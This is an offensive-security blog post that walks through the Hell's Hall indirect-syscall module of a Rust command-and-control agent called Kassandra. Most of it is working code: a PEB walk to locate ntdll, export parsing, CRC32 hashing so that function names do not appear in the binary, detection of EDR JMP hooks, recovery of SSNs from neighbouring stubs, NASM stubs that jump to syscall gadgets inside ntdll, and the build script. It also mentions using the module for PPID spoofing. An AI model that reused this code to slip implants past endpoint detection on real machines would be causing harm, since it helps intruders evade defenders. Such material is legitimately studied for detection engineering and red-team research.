Hell's Hall: Indirect Syscall Resolution in Rust

Offensive Security Jun 18, 2025

rustsyscallsevasionedrwindows

This post examines Kassandra’s Hell’s Hall implementation, used throughout the agent for all sensitive operations (as introduced in the architecture overview): a Rust module that resolves NT syscall numbers (SSNs) and syscall instruction addresses from ntdll.dll at runtime. It walks the PEB to find ntdll’s base address, parses the PE export table, detects EDR inline hooks, extracts SSNs from unhooked neighbors when a target function is hooked, and locates syscall; ret gadgets for indirect invocation. The x64 assembly stubs and build system integration are also covered.

Walking the PEB to Find ntdll

Every Windows process has a Process Environment Block (PEB) accessible through the GS segment register on x64 [1]. The PEB contains a pointer to the PEB_LDR_DATA structure, which maintains linked lists of loaded modules [2]. Kassandra reads the second entry in the InMemoryOrderModuleList to find ntdll.dll, since ntdll is always the second module loaded (after the executable itself):

// From: kassandra/src/hellshall/mod.rs
fn init_ntdll_config_structure() -> bool {
    unsafe {
        let peb = __readgsqword(0x60) as *const PEB;
        if peb.is_null() || (*peb).OSMajorVersion != 0xA {
            return false;
        }

        let ldr_entry = {
            let first_flink = (*(*peb).Ldr).InMemoryOrderModuleList.Flink;
            let second_flink = (*first_flink).Flink;
            (second_flink as *const u8).offset(-0x10) as *const LDR_DATA_TABLE_ENTRY
        };

        let u_module = (*ldr_entry).DllBase as ULONG_PTR;
        if u_module == 0 {
            return false;
        }
        // ...
    }
}

The __readgsqword(0x60) call reads the PEB pointer from GS:[0x60] [1]. The offset 0x60 is specific to x64; on x86, the PEB is at FS:[0x30]. The code also checks OSMajorVersion == 0xA to verify this is Windows 10 or later.

The InMemoryOrderModuleList is a doubly-linked list of LDR_DATA_TABLE_ENTRY structures [2]. The first Flink points to the executable module, the second Flink points to ntdll. The -0x10 offset adjustment converts from the InMemoryOrderLinks list entry position back to the base of the LDR_DATA_TABLE_ENTRY structure, because InMemoryOrderLinks is not the first field in the struct.

Parsing the PE Export Table

Once ntdll’s base address is known, the code validates the DOS and NT headers, then extracts the export directory to build a lookup table:

// From: kassandra/src/hellshall/mod.rs
        let dos_header = u_module as *const IMAGE_DOS_HEADER;
        if (*dos_header).e_magic != IMAGE_DOS_SIGNATURE {
            return false;
        }

        let nt_headers = (u_module as *const u8).add((*dos_header).e_lfanew as usize)
            as *const IMAGE_NT_HEADERS64;
        if (*nt_headers).Signature != IMAGE_NT_SIGNATURE {
            return false;
        }

        let export_dir = (u_module as *const u8)
            .add((*nt_headers).OptionalHeader.DataDirectory[0].VirtualAddress as usize)
            as *const IMAGE_EXPORT_DIRECTORY;
        if export_dir.is_null() {
            return false;
        }

        G_NTDLL_CONF.u_module = u_module;
        G_NTDLL_CONF.dw_number_of_names = (*export_dir).NumberOfNames;
        G_NTDLL_CONF.pdw_array_of_names =
            (u_module as *const u8).add((*export_dir).AddressOfNames as usize) as *const u32;
        G_NTDLL_CONF.pdw_array_of_addresses =
            (u_module as *const u8).add((*export_dir).AddressOfFunctions as usize) as *const u32;
        G_NTDLL_CONF.pw_array_of_ordinals =
            (u_module as *const u8).add((*export_dir).AddressOfNameOrdinals as usize) as *const u16;

The PE export directory [3] contains three parallel arrays: AddressOfNames (RVAs to function name strings), AddressOfFunctions (RVAs to function entry points), and AddressOfNameOrdinals (ordinal indices mapping names to functions). These are stored in a global NtdllConfig structure:

// From: kassandra/src/hellshall/mod.rs
#[repr(C)]
struct NtdllConfig {
    pdw_array_of_addresses: *const u32,
    pdw_array_of_names: *const u32,
    pw_array_of_ordinals: *const u16,
    dw_number_of_names: u32,
    u_module: ULONG_PTR,
}

This structure is initialized once (lazily, on first use) and cached in a static mut global for all subsequent syscall resolutions.

CRC32 Hashing of Function Names

Rather than storing NT function names as plaintext strings in the binary, Kassandra uses CRC32 hashing with the polynomial seed 0xEDB88320 to identify functions by hash:

// From: kassandra/src/hellshall/mod.rs
const SEED: u32 = 0xEDB88320;

pub fn crc32h(message: &str) -> u32 {
    let g0 = SEED;
    let g1 = g0 >> 1;
    let g2 = g0 >> 2;
    let g3 = g0 >> 3;
    let g4 = g0 >> 4;
    let g5 = g0 >> 5;
    let g6 = (g0 >> 6) ^ g0;
    let g7 = ((g0 >> 6) ^ g0) >> 1;

    let mut crc: i32 = -1;

    for &byte in message.as_bytes() {
        crc ^= byte as i32;

        let c = ((crc << 31) >> 31) as u32 & g7
            ^ ((crc << 30) >> 31) as u32 & g6
            ^ ((crc << 29) >> 31) as u32 & g5
            ^ ((crc << 28) >> 31) as u32 & g4
            ^ ((crc << 27) >> 31) as u32 & g3
            ^ ((crc << 26) >> 31) as u32 & g2
            ^ ((crc << 25) >> 31) as u32 & g1
            ^ ((crc << 24) >> 31) as u32 & g0;

        crc = ((crc as u32) >> 8) as i32 ^ c as i32;
    }

    !(crc as u32)
}

This is a table-less CRC32 implementation. Instead of a 256-entry lookup table, it computes CRC32 bit-by-bit using shifted and XORed versions of the polynomial. The pre-computed values g0 through g7 replace the table. The caller hashes a function name like "NtQuerySystemInformation" and compares the result against hashes computed from the export table during the lookup loop. This avoids having suspicious NT function name strings in the binary’s data section.

The NtSyscall Struct: What Gets Resolved

Each resolved syscall is stored in an NtSyscall structure:

// From: kassandra/src/hellshall/mod.rs
#[repr(C)]
#[derive(Clone, Copy)]
pub struct NtSyscall {
    pub dw_ssn: u32,
    pub dw_syscall_hash: u32,
    pub p_syscall_address: PVOID,
    pub p_syscall_inst_address: PVOID,
}

Four fields capture everything needed to invoke the syscall:

dw_ssn: The System Service Number, the index into the SSDT [4] that identifies which kernel function to call.
dw_syscall_hash: The CRC32 hash of the function name, used for lookup.
p_syscall_address: The address of the function’s entry point in ntdll (used for SSN extraction and hook detection).
p_syscall_inst_address: The address of a syscall instruction in ntdll memory. This is the key to indirect syscalls: instead of executing syscall from the agent’s own code, execution jumps to a syscall instruction inside ntdll’s address space, making the return address appear legitimate to kernel-mode telemetry [5].

Hook Detection and SSN Extraction

The core of Hell’s Hall is the fetch_nt_syscall function. It iterates over ntdll’s export table, matches the target function by CRC32 hash, then inspects the function’s bytes to determine if it is hooked and to extract the SSN.

The Unhooked Case

An unhooked NT syscall stub on x64 Windows has a well-known prologue [4]:

4C 8B D1        mov r10, rcx
B8 XX 00 00 00  mov eax, SSN

The code checks for this exact byte pattern:

// From: kassandra/src/hellshall/mod.rs
                // Check for unhooked syscall
                if *bytes == 0x4C
                    && *bytes.offset(1) == 0x8B
                    && *bytes.offset(2) == 0xD1
                    && *bytes.offset(3) == 0xB8
                    && *bytes.offset(6) == 0x00
                    && *bytes.offset(7) == 0x00
                {
                    let high = *bytes.offset(5);
                    let low = *bytes.offset(4);
                    nt_sys.dw_ssn = ((high as u32) << 8) | low as u32;
                    break;
                }

The SSN is a 16-bit value at bytes 4 and 5 of the stub (little-endian). Bytes 6 and 7 are verified to be zero, which confirms the SSN fits in two bytes (all known SSNs do). When this pattern matches, the function is unhooked and the SSN is extracted directly.

Hook Detection: The 0xE9 JMP Byte

EDR products hook NT functions by overwriting the first bytes of the stub with a JMP instruction (0xE9) that redirects execution to the EDR’s monitoring code [6]. Kassandra checks for two hook patterns:

Scenario 1: The very first byte is 0xE9 (the function entry point itself is overwritten with a jump).

Scenario 2: The first three bytes (4C 8B D1, the mov r10, rcx) are preserved, but byte 3 is 0xE9 instead of 0xB8 (the hook is placed just after the register move).

// From: kassandra/src/hellshall/mod.rs
                // Check for hooked syscall - scenario 1 (0xE9 jump)
                if *bytes == 0xE9 {
                    // ... neighbor scanning
                }

                // Check for hooked syscall - scenario 2 (0xE9 jump after 3 bytes)
                if *bytes.offset(3) == 0xE9 {
                    // ... neighbor scanning
                }

When either hook pattern is detected, the function’s SSN cannot be read directly. This is where neighbor scanning comes in.

Neighbor Scanning: Recovering SSNs from Hooked Functions

The key insight of Hell’s Hall (and related techniques like Halo’s Gate [7]) is that NT syscall stubs in ntdll are laid out sequentially in memory, and their SSNs are consecutive. If NtAllocateVirtualMemory has SSN 24 and NtProtectVirtualMemory is 5 stubs below it, then NtProtectVirtualMemory has SSN 29.

When a function is hooked, Kassandra scans neighboring functions in both directions (up and down in memory) looking for an unhooked stub:

// From: kassandra/src/hellshall/mod.rs
                if *bytes == 0xE9 {
                    for idx in 1..=RANGE {
                        let offset_down = (idx as i32 * DOWN) as isize;
                        let offset_up = (idx as i32 * UP) as isize;

                        // Check down
                        if *bytes.offset(offset_down) == 0x4C
                            && *bytes.offset(1 + offset_down) == 0x8B
                            && *bytes.offset(2 + offset_down) == 0xD1
                            && *bytes.offset(3 + offset_down) == 0xB8
                            && *bytes.offset(6 + offset_down) == 0x00
                            && *bytes.offset(7 + offset_down) == 0x00
                        {
                            let high = *bytes.offset(5 + offset_down);
                            let low = *bytes.offset(4 + offset_down);
                            nt_sys.dw_ssn =
                                (((high as u32) << 8) | low as u32).wrapping_sub(idx as u32);
                            break;
                        }

                        // Check up
                        if *bytes.offset(offset_up) == 0x4C
                            && *bytes.offset(1 + offset_up) == 0x8B
                            && *bytes.offset(2 + offset_up) == 0xD1
                            && *bytes.offset(3 + offset_up) == 0xB8
                            && *bytes.offset(6 + offset_up) == 0x00
                            && *bytes.offset(7 + offset_up) == 0x00
                        {
                            let high = *bytes.offset(5 + offset_up);
                            let low = *bytes.offset(4 + offset_up);
                            nt_sys.dw_ssn =
                                (((high as u32) << 8) | low as u32).wrapping_add(idx as u32);
                            break;
                        }
                    }
                }

The constants DOWN = 32 and UP = -32 represent the fixed size of an NT syscall stub (32 bytes) [4]. The search range RANGE = 0xFF means it will scan up to 255 stubs in each direction. When it finds an unhooked neighbor idx stubs below, it subtracts idx from that neighbor’s SSN to recover the target’s SSN. When it finds one idx stubs above, it adds idx.

This works because EDR products typically hook only a subset of NT functions (the security-relevant ones), leaving most stubs untouched. Even if the target function is hooked, there is almost always an unhooked neighbor within a few stubs.

Finding the syscall Instruction Gadget

The second critical piece for indirect syscalls is a valid syscall; ret instruction sequence inside ntdll’s memory. Rather than executing a syscall instruction from the agent’s own code (which would make the return address point into the agent binary, a telemetry signal), the agent jumps to a syscall instruction inside ntdll itself:

// From: kassandra/src/hellshall/mod.rs
        // looking for a syscall instruction in a neighboring function
        let u_func_address = (nt_sys.p_syscall_address as ULONG_PTR) + 0xFF;
        for z in 0..=RANGE as u32 {
            let x = z + 1;
            let bytes = u_func_address as *const u8;
            if *bytes.offset(z as isize) == 0x0F && *bytes.offset(x as isize) == 0x05 {
                nt_sys.p_syscall_inst_address = (u_func_address + z as usize) as PVOID;
                break;
            }
        }

The byte sequence 0x0F 0x05 is the x64 syscall instruction [8]. The search starts at the target function’s address plus 0xFF (255 bytes into the function or the next function) and scans forward up to 255 bytes. Since every NT stub contains a syscall instruction, this reliably finds one nearby.

The address of this instruction is stored in p_syscall_inst_address and later used by the assembly stub to perform the actual system call.

Validation: All Four Fields Must Be Set

After SSN extraction and gadget scanning, fetch_nt_syscall validates that all fields are populated before returning success:

// From: kassandra/src/hellshall/mod.rs
        nt_sys.dw_ssn != 0
            && !nt_sys.p_syscall_address.is_null()
            && nt_sys.dw_syscall_hash != 0
            && !nt_sys.p_syscall_inst_address.is_null()

If any step fails (function not found, SSN extraction failed, no syscall gadget located), the caller falls back to a non-syscall path or returns an error.

The x64 Assembly Stubs: SetSSn and RunSyscall

The actual syscall invocation uses two assembly functions linked from a NASM source file:

; From: kassandra/src/asm/hellsasm.asm
section .data
    wSystemCall         dq 0
    qSyscallInsAdress   dq 0

section .text
    default rel         ; enable RIP-relative addressing

    global SetSSn
    global RunSyscall

SetSSn:
    mov eax, ecx
    mov [rel wSystemCall], rax
    mov r8, rdx
    mov [rel qSyscallInsAdress], r8
    ret

RunSyscall:
    mov rax, rcx
    mov r10, rax
    mov eax, dword [rel wSystemCall]
    jmp qword [rel qSyscallInsAdress]

SetSSn stores two values: the SSN (from ecx, the first argument in the Windows x64 calling convention [9]) into wSystemCall, and the syscall instruction address (from rdx, the second argument) into qSyscallInsAdress. These are module-level variables in the .data section.

RunSyscall performs the actual indirect syscall. It moves the first argument (rcx) into both rax and r10 (the NT syscall calling convention passes the first argument in r10 and the syscall number in eax [4]), loads the stored SSN into eax, and jumps to the stored syscall instruction address inside ntdll. Because the jump target is inside ntdll, the syscall return address on the kernel stack points into ntdll’s .text section rather than into the agent binary.

The default rel directive enables RIP-relative addressing for the data references, which is necessary for position-independent code in x64 executables.

Calling Convention: How Rust Invokes the Stubs

The assembly functions are declared as external C functions in Rust:

// From: kassandra/src/hellshall/mod.rs
unsafe extern "C" {
    pub fn SetSSn(w_system_call: u16, syscall_inst_address: PVOID);
    pub fn RunSyscall(
        arg1: *mut winapi::ctypes::c_void,
        arg2: *mut winapi::ctypes::c_void,
        arg3: *mut winapi::ctypes::c_void,
        arg4: *mut winapi::ctypes::c_void,
        arg5: *mut winapi::ctypes::c_void,
        arg6: *mut winapi::ctypes::c_void,
        arg7: *mut winapi::ctypes::c_void,
        arg8: *mut winapi::ctypes::c_void,
        arg9: *mut winapi::ctypes::c_void,
        arg10: *mut winapi::ctypes::c_void,
        arg11: *mut winapi::ctypes::c_void,
    ) -> winapi::shared::ntdef::NTSTATUS;
}

RunSyscall takes 11 *mut c_void parameters to accommodate any NT syscall signature (most NT functions take 4 to 8 parameters). In the Windows x64 calling convention, the first four arguments are passed in rcx, rdx, r8, and r9, with the rest on the stack [9]. Since RunSyscall moves rcx into r10 and loads the SSN into eax before jumping to the syscall instruction, the remaining arguments (rdx, r8, r9, and stack arguments) pass through untouched to the kernel.

A typical call site looks like this:

// From: kassandra/src/checkin.rs
fn get_pid_via_syscall() -> u32 {
    unsafe {
        let hash = crc32h("NtQueryInformationProcess");
        let mut nt_query = NtSyscall::default();

        if !fetch_nt_syscall(hash, &mut nt_query) {
            return 0;
        }

        SetSSn(nt_query.dw_ssn as u16, nt_query.p_syscall_inst_address);

        let mut pbi: PROCESS_BASIC_INFORMATION = zeroed();
        let mut ret_len: u32 = 0;

        let status: NTSTATUS = RunSyscall(
            GetCurrentProcess() as _,
            ProcessBasicInformation as _,
            &mut pbi as *mut _ as _,
            size_of::<PROCESS_BASIC_INFORMATION>() as _,
            &mut ret_len as *mut _ as _,
            ptr::null_mut(), ptr::null_mut(), ptr::null_mut(),
            ptr::null_mut(), ptr::null_mut(), ptr::null_mut()
        );

        if status == 0 {
            pbi.UniqueProcessId as u32
        } else {
            0
        }
    }
}

The pattern is always: resolve the hash, call SetSSn to load the SSN and gadget address, then call RunSyscall with the NT function’s actual parameters (padding unused slots with null pointers). This same pattern is used in the process hardening module to resolve NtQuerySystemInformation and NtOpenProcess for PPID spoofing.

Build System: Compiling Assembly for GNU and MSVC Targets

The build.rs script handles assembling the syscall stubs for both toolchain targets:

// From: kassandra/build.rs
fn main() {
    let target = env::var("TARGET").expect("Missing TARGET environment variable");
    let out_dir = env::var("OUT_DIR").expect("Missing OUT_DIR environment variable");

    if !target.contains("x86_64") {
        panic!("This build script only supports x86_64 targets.");
    }

    if target.contains("msvc") {
        cc::Build::new()
            .file("src/asm/msvc/hellsasm.asm")
            .compile("hellsasm");
    } else if target.contains("gnu") {
        let sources = ["src/asm/hellsasm.asm"];
        if let Err(e) = nasm_rs::compile_library("hellsasm", &sources) {
            panic!("Failed to compile with NASM [hellsasm]: {}", e);
        }
        for source in &sources {
            println!("cargo:rerun-if-changed={}", source);
        }
        println!("cargo:rustc-link-search=native={}", out_dir);
        println!("cargo:rustc-link-lib=static=hellsasm");
    } else {
        panic!("Unsupported target: {}", target);
    }

    // ...
}

For GNU targets (cross-compilation from Linux with x86_64-pc-windows-gnu), it uses nasm-rs to compile the NASM syntax assembly. For MSVC targets (native Windows builds), it uses the cc crate to invoke MASM on a separate MSVC-syntax source file. Both produce a static library named hellsasm that gets linked into the final binary.

The build script enforces x86_64-only compilation, since the assembly stubs, byte patterns, and SSN extraction logic are all specific to the x64 syscall ABI.

Limitations and Honest Assessment

The 32-byte stub size assumption is not guaranteed. The constant DOWN = 32 and UP = -32 assume every NT syscall stub is exactly 32 bytes. While this holds for all known Windows 10/11 versions, Microsoft could change the stub layout in a future update, which would break neighbor scanning.

Hook detection only covers JMP (0xE9) hooks. Some EDR products use other hooking techniques, such as INT3 breakpoints (0xCC), hardware breakpoints, or VEH-based hooking. These would not be detected by the current byte-pattern checks.

The global mutable state is not thread-safe. The G_NTDLL_CONF structure is a static mut without synchronization. If multiple threads called fetch_nt_syscall concurrently during initialization, a data race could occur. In practice, Kassandra’s single-threaded task loop makes this unlikely but not impossible.

The syscall gadget search starts at a fixed offset. Starting the 0x0F 0x05 scan at function_address + 0xFF means it looks past the current function’s stub into neighboring memory. This works reliably because ntdll’s .text section contains many syscall instructions close together, but it does not guarantee finding the syscall instruction belonging to the specific function being resolved.

Drafted with LLM assistance from the Kassandra source code, reviewed and verified against the actual implementation.

References

[1] Microsoft, “Thread Environment Block (TEB),” https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-teb

[2] Microsoft, “PEB_LDR_DATA structure,” https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data

[3] Microsoft, “PE Format: Export Directory Table,” https://learn.microsoft.com/en-us/windows/win32/debug/pe-format#export-directory-table

[4] Schuster, A., “Windows System Call Tables,” https://j00ru.vexillium.org/syscalls/nt/64/

[5] MDSec, “Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams,” https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

[6] Elastic, “Detecting and Preventing EDR Unhooking Attacks,” https://www.elastic.co/security-labs/doubling-down-etw-callstacks

[7] Tiago, “Halo’s Gate: Evolving from Hell’s Gate,” https://blog.sektor7.net/#!res/2021/halosgate.md

[8] Intel, “Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 2B: SYSCALL,” https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html

[9] Microsoft, “x64 calling convention,” https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention